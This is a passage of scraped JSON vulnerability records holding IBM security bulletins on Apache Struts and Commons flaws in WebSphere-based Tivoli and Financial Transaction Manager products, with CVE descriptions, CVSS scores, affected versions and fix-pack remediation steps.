current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nTivoli Integrated Portal version 2.1.0 - 2.1.0.5 \n\nTivoli Integrated Portal version 2.2.0.0 - 2.2.0.17\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nTivoli Integrated Portal version \n\n2.1.0 - 2.1.0.5\n\n2.2.0 - 2.2.0.17\n\n| embedded Websphere Application Server version 7.0| [Security Bulletin: HTTP Response Splitting in WebSphere Application Server (CVE-2016-0359)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982526>) \n \n[Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n \nThe Websphere security bulletin above provides a link to the required iFix to remediate the vulnerability. However, the iFix requires either eWAS 7.0.0.33 or higher installed. \nTIP does not support upgrading Websphere fixpack independently. TIP 2.2.0.15 or TIP 2.2.0.17 must be applied which will upgrade eWAS to 7.0.0.33 and above. Once TIP FP has been applied, the Websphere iFix can be applied as described in the Websphere bulletin. \n\n## Workarounds and Mitigations\n\nPlease refer to WAS iFix as described above\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T15:26:47", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2016-0359, CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0359", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T15:26:47", "id": "F936FE55F38C08867ADBDA8E6F3802EAC3CA57726D86C3FDB2C0BC8583619B6F", "href": "https://www.ibm.com/support/pages/node/285285", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-22T01:48:27", "description": "## Summary\n\nVulnerabilities exist in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI. These only exist if you have deployed the optional UDDI application. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2012-1007_](<https://vulners.com/cve/CVE-2012-1007>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the upload-submit.do, processSimple.do and struts-cookbook/processDyna.do scripts. A remote attacker could exploit this vulnerability using the name or message parameter in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/73052_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73052>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly properly restrict the Validator configuration bin ActionServlet.java. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nTivoli Integrated Portal version 2.1.0 - 2.1.0.5\n\nTivoli Integrated Portal version 2.2.0.0 - 2.2.0.19\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s) | Affected Supporting Product and Version | Affected Supporting Product Security Bulletin \n---|---|--- \nTivoli Integrated Portal version \n\n2.1.0 - 2.1.0.5\n\n2.2.0 - 2.2.0.19\n\n| embedded Websphere Application Server version 7.0.x | \n\n# [Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) \n \n \nThe Websphere security bulletin above provides a link to the required iFix to remediate the vulnerability. However, the iFix requires either eWAS 7.0.0.31 or higher installed. \n \nTIP does not support upgrading Websphere fixpack independently. TIP 2.2.0.15 or TIP 2.2.0.17 or TIP 2.2.0.19 must be applied which will upgrade eWAS to 7.0.0.31 and above. Once TIP FP has been applied, the Websphere iFix can be applied as described in the Websphere bulletin.\n\n## Workarounds and Mitigations\n\nPlease refer to WAS iFix as described above\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-11-28T11:50:02", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI shipped with Tivoli Integrated Portal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1007", "CVE-2014-0114", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-11-28T11:50:02", "id": "E31CD1CAA68AD6659A7C459337F50C896A6D30B1CC25BEF6FC361000F2ACE0D4", "href": "https://www.ibm.com/support/pages/node/741905", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T01:33:44", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Tivoli Security Policy Manager (TSPM). Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Product Version**\n\n| \n\n**WebSphere Version** \n \n---|--- \n \nTSPM 7.1\n\n| \n\nWAS v7.0 \n \nRTSS 7.1\n\n| \n\nWAS v7.0, v8.0 \n \n**Note: **TSPM is comprised of TSPM and Runtime Security Services (RTSS)\n\n## ", "cvss3": {}, "published": "2018-07-23T06:08:09", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Tivoli Security Policy Manager (CVE-2014-0114, CVE-2016-1181, CVE-2016-1182, CVE-2012-1007)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1007", "CVE-2014-0114", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-07-23T06:08:09", "id": "A49F8E92510CDD96D8127764BC310529CF44A60596DB14352FF329575652A707", "href": "https://www.ibm.com/support/pages/node/717511", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T21:34:27", "description": "## Summary\n\nWebSphere Application Server is shipped with IBM Tivoli System Automation Application Manager. Information about multiple security vulnerabilities affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Tivoli System Automation Application Manager 4.1.0.0 \u2013 4.1.0.1\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with IBM Tivoli System Automation Application Manager.\n\nPrincipal Product and Version(s)\n\n| \n\nAffected Supporting Product and Version\n\n| \n\nAffected Supporting Product Security Bulletin \n \n---|---|--- \n \nIBM Tivoli System Automation Application Manager 4.1\n\n| \n\nWebSphere Application Server 8.5\n\n| \n\n[Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {}, "published": "2023-01-17T17:35:00", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2014-0114, CVE-2012-1007, CVE-2016-1182, CVE-2016-1181)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1007", "CVE-2014-0114", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2023-01-17T17:35:00", "id": "39D4A3024CD82E0AB1412C8F0B7DE6C9C896CC59E99FBAB7A5A61175586A3211", "href": "https://www.ibm.com/support/pages/node/719303", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T05:52:42", "description": "## Summary\n\nMultiple vulnerabilities in IBM Financial Transaction Manager for ACH Services, Check Services, Corporate Payment Services (CVE-2016-5920, CVE-2016-1181, CVE-2016-1182, CVE-2016-3060)\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n \n**CVEID:** [_CVE-2016-3060_](<https://vulners.com/cve/CVE-2016-3060>)** \nDESCRIPTION:** IBM Payments Director could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. \nCVSS Base Score: 5.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114896_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114896>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-5920_](<https://vulners.com/cve/CVE-2016-5920>)** \nDESCRIPTION:** IBM Financial Transaction Manager for ACH Services for Multi-Platform is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. \nCVSS Base Score: 5.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/115704_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/115704>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) \n\n\n## Affected Products and Versions\n\n\\- FTM for ACH v3.0.0.0, v3.0.0.1, v3.0.0.2, v3.0.0.3, v3.0.0.4, v3.0.0.5, v3.0.0.6, v3.0.0.7, v3.0.0.8, v3.0.0.9, v3.0.0.10, 3.0.0.11, 3.0.0.12, 3.0.0.13, 3.0.0.14, 3.0.1.0 \n\n\\- FTM for Check v3.0.0.0, v3.0.0.1, v3.0.0.2, v3.0.0.3, v3.0.0.4, v3.0.0.5, v3.0.0.6, v3.0.0.7, v3.0.0.8, v3.0.0.9, v3.0.0.10, 3.0.0.11, 3.0.0.12, 3.0.0.13, 3.0.0.14, 3.0.1.0\n\n\\- FTM for CPS v3.0.0.0, v3.0.0.1, v3.0.0.2, v3.0.0.3, v3.0.0.4, v3.0.0.5, v3.0.0.6, v3.0.0.7, v3.0.0.8, v3.0.0.9, v3.0.0.10, 3.0.0.11, 3.0.0.12, 3.0.0.13, 3.0.0.14\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nFTM for ACH Services| 3.0.0.0 through 3.0.0.14| PI67537| Apply [3.0.0-FTM-ACH-MP-fp0015](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=3.0.0-FTM-ACH-MP-fp0015&includeSupersedes=0>) or later. \nFTM for Check Services| 3.0.0.0 through 3.0.0.14| PI64063| Apply [3.0.0-FTM-Check-MP-fp0015](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=3.0.0-FTM-Check-MP-fp0015&includeSupersedes=0>) or later. \nFTM for CPS Services| 3.0.0.0 through 3.0.0.14| PI64064| Apply [3.0.0-FTM-CPS-MP-fp0015](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=3.0.0-FTM-CPS-MP-fp0015&includeSupersedes=0>) or later. \nFTM for ACH Services| 3.0.1.0| PI67537| Apply [3.0.1.0-FTM-ACH-MP-iFix0002](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=3.0.1.0-FTM-ACH-MP-iFix0002&includeSupersedes=0>) or later. \nFTM for Check Services| 3.0.1.0| PI64063| Apply [3.0.1.0-FTM-Check-MP-iFix0002](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=3.0.1.0-FTM-Check-MP-iFix0002&includeSupersedes=0>) or later. \nFTM for CPS Services| 3.0.1.0| PI64064| Apply [3.0.1.0-FTM-CPS-MP-iFix0002](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=3.0.1.0-FTM-CPS-MP-iFix0002&includeSupersedes=0>) or later. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T20:03:39", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Financial Transaction Manager for ACH Services, Check Services, Corporate Payment Services (CVE-2016-5920, CVE-2016-1181, CVE-2016-1182, CVE-2016-3060)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182", "CVE-2016-3060", "CVE-2016-5920"], "modified": "2018-06-16T20:03:39", "id": "8585A81D2C6357431DB37ADDF4189DBBFAC913BE555A9B6483BF16E8E8705C85", "href": "https://www.ibm.com/support/pages/node/549731", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:44:29", "description": "## Summary\n\nVulnerabilities exist in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI. These only exist if you have deployed the optional UDDI application. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2012-1007_](<https://vulners.com/cve/CVE-2012-1007>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the upload-submit.do, processSimple.do and struts-cookbook/processDyna.do scripts. A remote attacker could exploit this vulnerability using the name or message parameter in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/73052_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73052>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly properly restrict the Validator configuration bin ActionServlet.java. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affects the following versions and releases of IBM WebSphere Application Server traditional using the optional UDDI.ear. \n\n * Version 9.0\n * Version 8.5\n * Version 8.0\n * Version 7.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the interim fix, Fix Pack or PTF containing APAR PI97162 if you are using the optional UDDI.ear for each named product as soon as practical. \n \n**For WebSphere Application Server traditional and WebSphere Application Server Hypervisor Edition:** \n**For V9.0.0.0 through 9.0.0.8:** \n\u00b7 Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI97162](<http://www-01.ibm.com/support/docview.wss?uid=swg24044995>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24042908>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042513>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>) \n\\--OR-- \n\u00b7 Apply Fix Pack 9.0.0.9 or later. \n \n**For V8.5.0.0 through 8.5.5.13:** \n\u00b7 Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI9716](<http://www-01.ibm.com/support/docview.wss?uid=swg24044993>) 2[](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24042908>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042712>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042513>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>) \n\\--OR-- \n\u00b7 Apply Fix Pack 8.5.5.14 or later. \n\n**For V8.0.0.0 through 8.0.0.15:** \n\u00b7 Upgrade to a minimal fix pack levels as required by interim fix and then apply Interim Fix [PI97162](<http://www-01.ibm.com/support/docview.wss?uid=swg24044993>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>)\n\n**For V7.0.0.0 through 7.0.0.45:** \n\u00b7 Upgrade to a minimal fix pack levels as required by interim fix and then apply Interim Fix [PI97162](<http://www-01.ibm.com/support/docview.wss?uid=swg24044993>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>)\n\n \n \n_WebSphere Application Server V7 and V8 are no longer in full support; IBM recommends upgrading to a fixed, supported version/release/platform of the product. _\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2019-02-19T17:50:01", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1007", "CVE-2014-0114", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2019-02-19T17:50:01", "id": "615E4369D0B07E7BA358AF447BD05A3ACC0720A255109ADB57E2A2080DB3607A", "href": "https://www.ibm.com/support/pages/node/711865", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:45:32", "description": "## Summary\n\nVulnerabilities exist in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI. These only exist if you have deployed the optional UDDI application. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2012-1007_](<https://vulners.com/cve/CVE-2012-1007>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the upload-submit.do, processSimple.do and struts-cookbook/processDyna.do scripts. A remote attacker could exploit this vulnerability using the name or message parameter in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/73052_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73052>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly properly restrict the Validator configuration bin ActionServlet.java. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the 